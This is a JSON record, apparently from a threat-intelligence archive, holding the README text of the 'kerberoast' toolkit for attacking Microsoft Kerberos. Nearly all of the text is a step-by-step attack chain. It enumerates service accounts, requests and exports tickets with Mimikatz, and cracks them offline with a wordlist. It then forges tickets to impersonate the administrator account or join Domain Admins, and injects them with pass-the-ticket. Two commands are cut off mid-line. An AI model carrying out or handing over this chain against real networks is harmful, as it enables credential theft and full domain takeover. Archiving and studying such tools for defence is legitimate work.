{
	"id": "6e066a03-41aa-47ad-a7d0-61d0459b8db1",
	"created_at": "2026-04-06T00:09:18.556995Z",
	"updated_at": "2026-04-10T03:22:04.031254Z",
	"deleted_at": null,
	"sha1_hash": "6dd015141b1449478c98faf4cf9213cddabb189b",
	"title": "GitHub - nidem/kerberoast",
	"llm_title": "",
	"authors": "",
	"file_creation_date": "0001-01-01T00:00:00Z",
	"file_modification_date": "0001-01-01T00:00:00Z",
	"file_size": 43010,
	"plain_text": "GitHub - nidem/kerberoast\r\nBy nidem\r\nArchived: 2026-04-05 23:38:02 UTC\r\nKerberoast is a series of tools for attacking MS Kerberos implementations. Below is a brief overview of what each\r\ntool does.\r\nExtract all accounts in use as SPN using built in MS tools\r\nPS C:\\\u003e setspn -T medin -Q */*\r\nRequest Ticket(s)\r\nOne ticket:\r\nPS C:\\\u003e Add-Type -AssemblyName System.IdentityModel\r\nPS C:\\\u003e New-Object System.IdentityModel.Tokens.KerberosRequestorSecurityToken -ArgumentList \"HTTP/web01.medin.lo\r\nAll the tickets\r\nPS C:\\\u003e Add-Type -AssemblyName System.IdentityModel\r\nPS C:\\\u003e setspn.exe -T medin.local -Q */* | Select-String '^CN' -Context 0,1 | % { New-Object System.IdentityMode\r\nExtract the acquired tickets from ram with Mimikatz\r\nmimikatz # kerberos::list /export\r\nCrack with tgsrepcrack\r\n./tgsrepcrack.py wordlist.txt 1-MSSQLSvc~sql01.medin.local~1433-MYDOMAIN.LOCAL.kirbi\r\nRewrite\r\nMake user appear to be a different user\r\n./kerberoast.py -p Password1 -r 1-MSSQLSvc~sql01.medin.local~1433-MYDOMAIN.LOCAL.kirbi -w sql.kirbi -u 500\r\nhttps://github.com/nidem/kerberoast\r\nPage 1 of 2\n\nAdd user to another group (in this case Domain Admin)\r\n./kerberoast.py -p Password1 -r 1-MSSQLSvc~sql01.medin.local~1433-MYDOMAIN.LOCAL.kirbi -w sql.kirbi -g 512\r\nInject back into RAM with Mimikatz\r\nkerberos::ptt sql.kirbi\r\nSource: https://github.com/nidem/kerberoast\r\nhttps://github.com/nidem/kerberoast\r\nPage 2 of 2",
	"extraction_quality": 1,
	"language": "EN",
	"sources": [
		"ETDA"
	],
	"references": [
		"https://github.com/nidem/kerberoast"
	],
	"report_names": [
		"kerberoast"
	],
	"threat_actors": [],
	"ts_created_at": 1775434158,
	"ts_updated_at": 1775791324,
	"ts_creation_date": 0,
	"ts_modification_date": 0,
	"files": {
		"pdf": "https://archive.orkl.eu/6dd015141b1449478c98faf4cf9213cddabb189b.pdf",
		"text": "https://archive.orkl.eu/6dd015141b1449478c98faf4cf9213cddabb189b.txt",
		"img": "https://archive.orkl.eu/6dd015141b1449478c98faf4cf9213cddabb189b.jpg"
	}
}